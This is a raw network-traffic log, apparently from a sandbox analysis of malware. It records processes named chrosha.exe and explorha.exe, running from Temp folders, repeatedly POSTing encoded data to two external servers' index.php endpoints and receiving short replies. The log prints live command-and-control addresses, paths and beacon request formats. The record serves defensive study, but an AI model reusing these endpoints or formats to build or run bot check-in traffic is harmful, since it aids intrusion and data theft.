                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1022 | 192.168.2.5 | 50876 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:40.514228106 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:34:40.765721083 CEST
Bytes transferred: 197
Direction: IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 1023
Source IP: 192.168.2.5
Source Port: 50877
Destination IP: 193.233.132.56
Destination Port: 80
PID: 2956
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp: Apr 19, 2024 03:34:40.590543032 CEST
Bytes transferred: 312
Direction: OUT
Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:34:40.846174955 CEST
Bytes transferred: 196
Direction: IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1024
Source IP: 192.168.2.5
Source Port: 50878
Destination IP: 193.233.132.167
Destination Port: 80
PID: 8024
Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:34:41.022152901 CEST
Bytes transferred: 309
Direction: OUT
Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:34:41.279551029 CEST
Bytes transferred: 196
Direction: IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1025
Source IP: 192.168.2.5
Source Port: 50879
Destination IP: 193.233.132.56
Destination Port: 80
PID: 4484
Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:34:41.218952894 CEST
Bytes transferred: 158
Direction: OUT
Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:34:41.466609001 CEST
Bytes transferred: 219
Direction: IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 1026
Source IP: 192.168.2.5
Source Port: 50880
Destination IP: 193.233.132.167
Destination Port: 80
PID: 8024
Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:34:41.646644115 CEST
Bytes transferred: 155
Direction: OUT
Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:34:41.889575958 CEST
Bytes transferred: 197
Direction: IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 1027
Source IP: 192.168.2.5
Source Port: 50881
Destination IP: 193.233.132.56
Destination Port: 80
PID: 4484
Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:34:41.723089933 CEST
Bytes transferred: 312
Direction: OUT
Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:34:41.979163885 CEST
Bytes transferred: 196
Direction: IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1028
Source IP: 192.168.2.5
Source Port: 50882
Destination IP: 193.233.132.167
Destination Port: 80
PID: 8024
Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:34:42.136017084 CEST
Bytes transferred: 309
Direction: OUT
Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:42.382343054 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1029 | 192.168.2.5 | 50883 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:42.346355915 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:42.589334011 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1030 | 192.168.2.5 | 50884 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:42.740041018 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:42.982563019 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1031 | 192.168.2.5 | 50885 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:42.836025000 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:43.082053900 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1032 | 192.168.2.5 | 50886 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:43.229115009 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:43.476166010 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1033 | 192.168.2.5 | 50887 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:43.450431108 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:43.701328039 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1034 | 192.168.2.5 | 50888 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:43.839802980 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.084517956 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1035 | 192.168.2.5 | 50889 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:43.948596001 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.195633888 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1036 | 192.168.2.5 | 50890 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.340338945 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.598221064 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1037 | 192.168.2.5 | 50891 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.547676086 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.787472963 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1038 | 192.168.2.5 | 50892 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:44.969702005 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.216371059 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1039 | 192.168.2.5 | 50893 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.041735888 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.296123028 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1040 | 192.168.2.5 | 50894 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.481431961 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
